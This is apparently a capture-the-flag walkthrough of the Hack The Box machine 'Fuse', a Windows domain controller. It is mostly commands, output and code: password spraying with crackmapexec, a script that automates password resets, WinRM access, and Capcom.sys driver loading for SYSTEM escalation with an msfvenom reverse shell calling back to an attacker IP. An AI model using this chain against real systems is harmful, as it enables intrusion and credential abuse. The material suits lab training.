Fuse HTB
IP
10.10.10.193
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.193 | cut -d"/" -f1 | tr '\n' ','
results
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708
Lets run a more in-depth scan of the target
sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708 -oA tcp_ports 10.10.10.193
results
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open โ๏ฟฝh๏ฟฝ๏ฟฝU Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-07T23:37:32
|_ start_date: 2024-01-07T23:30:39
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds
what we can see
Most likely a domain controller given the presence of DNS, Kerberos, ldap etc
Windows server 2016
domain name:
fabricorp.local
we can add this to our hosts fileHosts name:
FUSE
Lets see if we can perform a zone transfer since Port 53 (DNS) is present
dig @10.10.10.193 fabricorp.local AXFR
No luck
Lets test for anonymous authentication among the services
SMB
crackmapexec smb 10.10.10.193 -u anonymous -p ''
No luck
LDAP
ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC-local" "(ObjectClass=person)"

No luck
RPC
rpcclient -N -U anonymous 10.10.10.193
No luck
Lets try the web Server
when we try to navigate to http://fabrcorp.local
we are redirected to `http://fuse.fabricorp.local/papercut/logs/html/index.htm Lets add the subdomain fuse
to our subdomain
when we do and try and access the page again we can see the following

Looking att the print logs we can see a couple of username's on the system
pmerton
tlavel
sthompson
bhult
administrator
other then usernames i cant really find any other peices of interesting information, and we need a set of working creds to progress so we can utilise cewl
to build a wordlist we could use with the usernames we have found
building a wordlist
cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 4 > pass_lists.txt
Now we have a list of possible usernames Lets perform some password spraying via smb
crackmapexec smb 10.10.10.193 -u usernames.txt -p pass_lists.txt
we do see something interesting

we have
tlavel:Fabricorp01
bhult:Fabricorp01
But looks like the passwords have expired
tried to authenticate to a few services, but no luck
if we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE
, meaning we do have valid credentials but they are expired, we could try and reset the password using a tool like smbpasswd
impacket-smbpasswd fabricorp/tlavel:Fabricorp01@10.10.10.193 -newpass shrek123!
Now we just need to create a password that matches the Password complexity
shrek123!
It seems the password expires after 1 minute from creation, wat we can do is write a basic python script that will automate the password change process
import subprocess
import random
import string
def gen_password(length=9):
chars = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(chars) for i in range(length))
return password
def escape_password(password):
# Escape special characters in the password
return password.replace('"', r'\"').replace("'", r"\'")
def Grabitall():
new_password = gen_password()
escaped_pass = escape_password(new_password)
change_pass = [
'/usr/bin/impacket-smbpasswd',
'fabricorp/tlavel:Fabricorp01@10.10.10.193',
'-newpass',
escaped_pass
]
try:
#running the command
result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
#checking if trhe command was successful (exit code is zero)
if result.returncode == 0:
print(f"{new_password}")
else:
print("Password change failed")
print(f'Command output {result.stderr}')
except subprocess.CalledProcessError as e:
print(f'the following error has occured {e}')
print(f"Command output {result.stderr}")
Grabitall()
Now that we have our automation script, we can continue enumerating
Lets list all the shares
Lets create a new password
./smbpasswd.py

Now lets use crackmapexec to list all the shares
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' --shares
for good measures we will also use the spider_plus module and see if we can find anything interesting
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' -M spider_plus
Nothing to interesting within smb so lets head over to rpc
rpcclient -U fabricorp/tlavel 10.10.10.193
when we enumerate domain users we can see the following
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
Since within http it showed printing information a good place to start enumerating would be the printers
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Looks like we could have a possible password
scan2docs: $fab@s3Rv1ce$1
Looks like creds for the
HP-MFT01
smb share
crackmapexec smb 10.10.10.193 -u scan2docs -p '$fab@s3Rv1ce$1'
Doesnt authenticate

Lets perform some password spraying using the recently found usernames
first lets clean them up
sed -n 's/user:\[\(.*\)\] rid:.*/\1/p' usernames > cleaned_usernames.txt
Lets use crackmapexec to perform the password spraying
crackmapexec smb 10.10.10.193 -u cleaned_usernames.txt -p '$fab@s3Rv1ce$1'
and we can see we have some valid creds

svc-print: $fab@s3Rv1ce$1
Lets list the shares we have access to
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' --shares

Lets use the spider_plus module and see if we have access to anything interesting
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' -M spider_plus
nothing interesting
Lets see if we can winrm into the machine
evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
we have a shell on the system

Now we have a session on the target, Lets see if we can enumerate ldap with bloodhound-python
and get some info on the system
bloodhound-python -c all -d fabricorp.local -u svc-print -p '$fab@s3Rv1ce$1' -ns 10.10.10.193
Lets start neo4j
sudo neo4j console
login
start bloodhound
bloodhound --no-sandbox
Now we can digest all the information we found using bloodhound-python
Dont really find much interesting
If we look within our current privileges on the machine we can see something interesting

we can see we have the SeLoadDrivePrivilege enabled for our current user
essentially allows us to place something in the kernel
How can we exploit this?
essentially since we have the
SeLoadDriverPrivilege
we are able to load a vulnerable driver, then exploit said driver this post explains this better
we can use the following vulnerable driver
Lets walk thorugh the steps needed to compile, load, and exploit the SeLoadDriverPrivilege
We will need to compile a few
.exe
files for the following attack, the best way to compile.exe
files would be in a Windows VM. To load the vulnerable drivercapcom.sys
we will use the following tool from Tarlogic security https://github.com/TarlogicSecurity/EoPLoadDriver/
git clone https://github.com/TarlogicSecurity/EoPLoadDriver.git
After we have downloaded the tool (essentially a single c++ file) Let's start a new project in VS , at the window, we will choose the C++ Console App
Note: when creating a new project and specifying the project template "Console App" you may run into an error when creating the project, to fix this go to the visual studio installer

click 'Modify' and download the 'Desktop development with C++'

After this is installed we should be able to specify the Console App
template without error
alright back to compiling the
eopladdriver.cpp
lets start a new project

click 'Next'
In the next window we can specify the name of our new project

here we can specify the name of the project (you can name it whatever you want)
Looking in the project we can see a basic hello world project

Now we can replace the code within
EoPloadDriver.cpp
code below
after we have copy and paste the code, we can set the project to 'Release' and 'x64'

then we select 'Build' -> 'Build Solution'
Note: we receive and error with the line
include "stdafx.h"
we can just remove it and it will build
now we should be able to see the .exe
file within the specified file path

Now we can transfer this over to our linux machine
for this i will start a python HTTP server on my windows machine
python.exe -m http.server 80
from our linux machine
wget http://<windows_ip>/EoPLoadDriver.exe
Now we can upload it to the target machine
upload EoPLoadDriver.exe
We also need to upload the Capcom.sys
upload Capcom.sys
Now that we have the vulnerable driver and the loader to the target machine, we can run same command we saw in the blog post
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys
we can see the following

it looks like it has worked no error, but we dont have the permissions if the driver is actually running
Next we need to build the actual exploit for our vulnerable driver, we can use the following code
Since this is a .sln
file we will need to utilise visual studio on our windows machine, after we have cloned the repo we can simply double click on the ExploitCapcom.sln
file
Lets build the project to see if an error occur before we modify the code

No errors, ready for us to modify the code slightly, if we look at the
LaunchShell
function we can see the following
// Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;
this just open a cmd prompt, but since we only have remote access to the machine this is pretty pointless, what we will do is generate a reverse-shell with msfvenom and drop that on the system, instead of the function executing
cmd.exe
we are going to make it executeshrek123.exe
our reverse-shell
so we want to change one line in the code
/ Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\ProgramData\\shrek123.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;
Now we can build the
executable
file, just like what we did with the loader
Lets download this onto our linux host, same as before with a python http server
Lets generate our reverse-shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.22 LPORT=9001 -f exe -o shrek123.exe
Lets upload and start a listner
upload shrek123.exe
upload ExploitCapcom.exe
start a listener
rlwrap -cAr nc -lvnp 9001
Lets execute the exploit
note: may have to run the follwoing again before executing the exploit
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys
Lets execute the exploit
.\ExploitCapcom.exe
if we check our listener we should have a shell

Last updated